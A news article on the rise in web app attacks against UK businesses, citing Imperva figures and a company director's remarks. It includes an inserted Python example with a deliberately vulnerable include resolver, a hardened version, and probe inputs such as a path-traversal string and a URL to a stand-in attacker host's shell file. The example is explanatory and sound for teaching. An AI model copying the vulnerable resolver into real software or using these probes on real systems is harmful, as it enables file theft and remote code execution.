Attacks on web apps may lead to a crappy appy Christmas
- Web app attacks on UK businesses have jumped by 251% since October 2019
- Imperva found that attacks are increasing on average by 22% per quarter
- The pandemic placed immense urgency on businesses to get all kinds of digital transformation projects live as quickly as possible
Web apps and mobile apps are now an integral part of modern society. Almost all businesses rely on applications to connect with their customers and to understand what those customers need.
While reliance on apps has increased, cybercriminals are also targeting both web and mobile apps to launch attacks on users and organizations. Such attacks have been increasing globally and are expected to continue throughout the holiday period, when app usage peaks.
According to research from Imperva, web app attacks on UK businesses have jumped by 251% since October 2019. More alarmingly, Imperva found that attacks are increasing on average by 22% per quarter, with a 68% surge from Q2 to Q3 2021, showing how web app attacks are continuing to balloon in the run-up to Christmas.
As such, both organizations and consumers are at risk of suffering from a ‘crappy appy’ Christmas. For businesses, the rise of these attacks means organizations are at a heightened risk of encountering data leakage or data scraping incidents, in which sensitive customer data is placed in the hands of attackers.
It’s not all ‘crappy appy’
The problem with apps, be it web or mobile, is that both consumers and businesses are extremely dependent on them today. This dependence makes it harder to secure applications as companies keep on adding new features to their apps.
At the same time, almost all apps today require users to input some form of data. Be it personal details or payment information, cybercriminals want that data, and they have been successful in getting it in the past.
Remote code execution (RCE) and remote file inclusion (RFI) attacks, which jumped by 271%, are one example. RCE / RFI attacks target businesses’ websites and servers: an attacker tricks the application into loading and running code from a location they control, and uses that foothold to steal information, compromise servers, or even take over websites and modify their content.
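To make the RFI/LFI mechanism concrete, here is an added example (not code from the article or from Imperva) of the classic bug in a page-include handler, alongside a hardened version. The template directory, the allowlist of page names and the sample inputs are all assumptions constructed for this illustration.

```python
import os
from urllib.parse import urlparse

# Hypothetical template directory for the example web app (assumption).
TEMPLATE_ROOT = "/srv/app/templates"
# Constructed allowlist of page names the hardened resolver will accept.
ALLOWED_PAGES = {"home", "checkout", "account"}
REMOTE_SCHEMES = ("http", "https", "ftp")


def resolve_include_vulnerable(page: str) -> str:
    """The classic inclusion bug: a 'page' query parameter is joined into an
    include path with no validation.

    - A URL such as http://attacker.example/shell.txt is returned untouched,
      so a remote-include-capable runtime would fetch and execute it (RFI).
    - '../' sequences walk out of TEMPLATE_ROOT and expose arbitrary local
      files (LFI / path traversal).
    """
    if urlparse(page).scheme in REMOTE_SCHEMES:
        return page  # attacker-controlled remote resource
    return os.path.normpath(os.path.join(TEMPLATE_ROOT, page + ".html"))


def resolve_include_hardened(page: str) -> str:
    """Hardened form: accept only known page names, then verify that the
    resolved path still lies under TEMPLATE_ROOT (defence in depth against
    symlinks or future changes to the allowlist)."""
    if page not in ALLOWED_PAGES:
        raise ValueError(f"unknown page: {page!r}")
    root = os.path.realpath(TEMPLATE_ROOT)
    path = os.path.realpath(os.path.join(root, page + ".html"))
    if not path.startswith(root + os.sep):
        raise ValueError("resolved path escapes the template root")
    return path


def escapes_template_root(path: str) -> bool:
    """True if a resolved include points outside TEMPLATE_ROOT or at a remote URL."""
    if urlparse(path).scheme in REMOTE_SCHEMES:
        return True
    root = os.path.normpath(TEMPLATE_ROOT) + os.sep
    return not os.path.normpath(path).startswith(root)


if __name__ == "__main__":
    # Constructed attacker inputs of the kind seen in RFI / LFI probes.
    for probe in ("home", "../../../etc/passwd", "http://attacker.example/shell.txt"):
        vulnerable = resolve_include_vulnerable(probe)
        print(f"vulnerable: {probe!r} -> {vulnerable} (escapes: {escapes_template_root(vulnerable)})")
        try:
            print(f"hardened:   {probe!r} -> {resolve_include_hardened(probe)}")
        except ValueError as exc:
            print(f"hardened:   {probe!r} rejected ({exc})")
```

The allowlist is what actually closes the hole; the realpath check is a second layer so that a later mistake in the allowlist cannot quietly reopen traversal.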
Earlier this year, Imperva Research Labs found that half (50%) of all data breaches begin with web applications. With the number of breaches increasing by 30% annually and the number of records stolen rising by a staggering 224%, it is estimated that 40 billion records will be compromised by the end of 2021, with web app vulnerabilities likely responsible for around 20 billion of them.
The biggest pitfall is that when apps are compromised, the company’s reputation is at stake as well. Many organizations have been criticized and have faced huge losses whenever their applications go offline.
Dependence on web and mobile apps
According to Peter Klimek, Director of Technology at Imperva, the pandemic placed immense urgency on businesses to get all kinds of digital transformation projects live as quickly as possible, and that is almost certainly a driving factor behind this surge in attacks.
“The changing nature of application development itself is also hugely significant. Developments like the rapid proliferation of APIs and the shift to cloud-native computing are beneficial from a DevOps standpoint, but for security teams, these changes in application architecture and the accompanying increased attack surface are making their jobs much, much harder,” added Klimek.
Losses relating to fraud and cybercrime have spiraled out of control during the pandemic, with the National Fraud Intelligence Bureau estimating that around £1.3bn was lost in the first half of 2021 alone, more than three times the amount lost during the same period in 2020. These figures suggest that the problem will continue to worsen throughout 2022.
Klimek pointed out that businesses are seeing more traffic through their web applications than ever before, in particular APIs.
“More than 70% of web traffic now comes through APIs, meaning businesses’ exposure is only getting higher. It’s no longer enough to have a WAF in place and hope for the best – businesses need to invest in a comprehensive Web Application and API Protection (WAAP) stack featuring elements like RASP and Advanced Bot Protection, allowing them to secure everything from edge to database,” he explained.